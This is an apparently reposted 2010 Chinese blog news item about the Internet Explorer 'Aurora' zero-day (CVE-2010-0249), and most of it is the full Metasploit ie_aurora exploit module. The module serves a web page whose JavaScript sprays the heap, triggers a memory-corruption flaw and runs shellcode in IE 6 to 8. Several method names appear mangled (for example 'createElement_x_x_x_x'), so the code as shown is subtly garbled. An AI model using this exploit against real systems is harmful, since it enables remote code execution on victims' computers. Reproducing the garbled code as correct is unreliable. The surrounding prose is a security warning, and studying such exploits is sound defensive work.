加载中…
个人资料
微博
  • 博客等级:
  • 博客积分:
  • 博客访问:
  • 关注人气:
  • 获赠金笔:0支
  • 赠出金笔:0支
  • 荣誉徽章:
正文 字体大小:

微软证实:新年首个IE高危漏洞 大规模挂马攻击将至(二)

(2010-01-20 12:23:45)
标签:

ie

高危漏洞

极光零日漏洞

挂马

网盾

漏洞

石晓虹

大璞不完

 分类: 信息安全

[导读]微软14日证实新年首个IE0day高危漏洞(IE Dom 0day漏洞),该漏洞几乎涉及所有IE浏览器。微软尚未推出相应官方补丁,针对该漏洞的攻击代码就已开始在网上扩散,攻击代码外泄将导致在未来几天引发大规模的网页挂马攻击。

近日,全球多家安全厂商同时发布安全预警,公布了微软最新IE Dom 0day漏洞(极光零日漏洞)的相关信息。随着该漏洞信息的不断被披露,目前网上已经出现基于该漏洞的完整的恶意攻击代码。由于微软尚未发布此漏洞的安全补丁,一些企业和用户担心受到此漏洞的攻击。金山安全专家认为由于该漏洞触发概率很高,很可能在近期就会被大规模利用,并提醒广大网友注意防范。

    据悉,1月13日,IE Dom 0day漏洞(极光零日漏洞)溢出代码出现。次日,微软总部发布安全公告提醒广大用户注意IE Dom 0day漏洞(极光零日漏洞),并于1月14日晚发布公告称,黑客在最近的针对Google、Adobe以及其他公司的攻击中利用了IE零日漏洞(编号979352)。同日,金山安全专家密切关注IE Dom 0day漏洞(极光零日漏洞)。1月15日,国际安全厂商披露漏洞攻击代码已经在网上公布,同时,金山安全专家捕获到漏洞攻击代码,分析确认金山网盾四层拦截可以防御该漏洞最终执行。 

Internet Explorer CVE-2010-0249 远程代码执行漏洞
 

Internet Explorer CVE-2010-0249 远程代码执行漏洞

##

# $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $

##  

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

#http://metasploit.com/framework/

##  

require 'msf/core'  

class Metasploit3 < Msf::Exploit::Remote

        Rank = NormalRanking

        include Msf::Exploit::Remote::HttpServer::HTML

        include Msf::Exploit::Remote::BrowserAutopwn

        autopwn_info({

                :ua_name    => HttpClients::IE,

                :ua_minver  => "6.0",

                :ua_maxver  => "8.0",

                :javascript => true,

                :os_name    => OperatingSystems::WINDOWS,

                :vuln_test  => nil, # no way to test without just trying it

        })  

        def initialize(info = {})

                super(update_info(info,

                        'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',

                        'Description'    => %q{

                                This module exploits a memory corruption flaw in Internet Explorer. This

                        flaw was found in the wild.

                        },

                        'License'        => MSF_LICENSE,

                        'Author'         =>

                                [

                                        'unknown',

                                        'hdm'      # Metasploit port

                                ],

                        'Version'        => '$Revision: 8136 $',

                        'References'     =>

                                [

                                        ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],

                                        ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']

 

                                ],

                        'DefaultOptions' =>

                                {

                                        'EXITFUNC' => 'process',

                                },

                        'Payload'        =>

                                {

                                        'Space'    => 1000,

                                        'BadChars' => "\x00",

                                        'Compat'   =>

                                                {

                                                        'ConnectionType' => '-find',

                                                },

                                        'StackAdjustment' => -3500,

                                },

                        'Platform'       => 'win',

                        'Targets'        =>

                                [

                                        [ 'Automatic', { }],

                                ],

                        'DisclosureDate' => 'Jan 14 2009', # wepawet sample

                        'DefaultTarget'  => 0))

        end

        def on_request_uri(cli, request)

                if (request.uri.match(/\.gif/i))

                        data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]

                        send_response(cli, data, { 'Content-Type' => 'image/gif' })

                        return

                end

                var_memory    = rand_text_alpha(rand(100) + 1)

                var_boom      = rand_text_alpha(rand(100) + 1)

                var_x1        = rand_text_alpha(rand(100) + 1)

                var_e1        = rand_text_alpha(rand(100) + 1)

                var_e2        = rand_text_alpha(rand(100) + 1)

                var_comment   = rand_text_alpha(rand(100) + 1);

                var_abc       = rand_text_alpha(3);

                var_ev1       = rand_text_alpha(rand(100) + 1)

                var_ev2       = rand_text_alpha(rand(100) + 1)

                var_sp1       = rand_text_alpha(rand(100) + 1)

                var_unescape  = rand_text_alpha(rand(100) + 1)

                var_shellcode = rand_text_alpha(rand(100) + 1)

                var_spray     = rand_text_alpha(rand(100) + 1)

                var_start     = rand_text_alpha(rand(100) + 1)

                var_i         = rand_text_alpha(rand(100) + 1)

                rand_html     = rand_text_english(rand(400) + 500)

                html = %Q|<html>

<head>

<script>

        var #{var_comment} = "COMMENT";

        var #{var_x1} = new Array();

        for (i = 0; i < 200; i ++ ){

           #{var_x1}[i] = document.createElement_x_x_x_x(#{var_comment});

           #{var_x1}[i].data = "#{var_abc}";

        };

        var #{var_e1} = null;

        var #{var_memory} = new Array();

        var #{var_unescape} = unescape;

        function #{var_boom}() {

                 var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');

                 var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );

                 do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );

                 for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};

        }

         function #{var_ev1}(evt){

                #{var_boom}();

            #{var_e1} = document.createEventObject(evt);

            document.getElementByIdx("#{var_sp1}").innerHTML = "";

            window.setInterval(#{var_ev2}, 50);

        }

         function #{var_ev2}(){

          p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";

          for (i = 0; i < #{var_x1}.length; i ++ ){

              #{var_x1}[i].data = p;

          }

           var t = #{var_e1}.srcElement;

        }

</script>

</head>

<body>

 <span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>

 </body>

</html>

                |

                 # Transmit the compressed response to the client

                send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

                # Handle the payload

                handler(cli)

        end

end
  作为国内唯一的微软VIA联盟的成员,金山安全专家认为微软IE Dom 0day漏洞影响巨大,该漏洞已经被黑客利用,可被黑客用于大范围传播木马病毒,如果用户访问了包含该漏洞的网站,将面临严重安全威胁。(大璞不完

喜欢

0

阅读 收藏 喜欢 打印举报/Report
  

新浪BLOG意见反馈留言板 欢迎批评指正

新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 产品答疑

Copyright © 1996 - 2022 SINA Corporation, All Rights Reserved

新浪公司 版权所有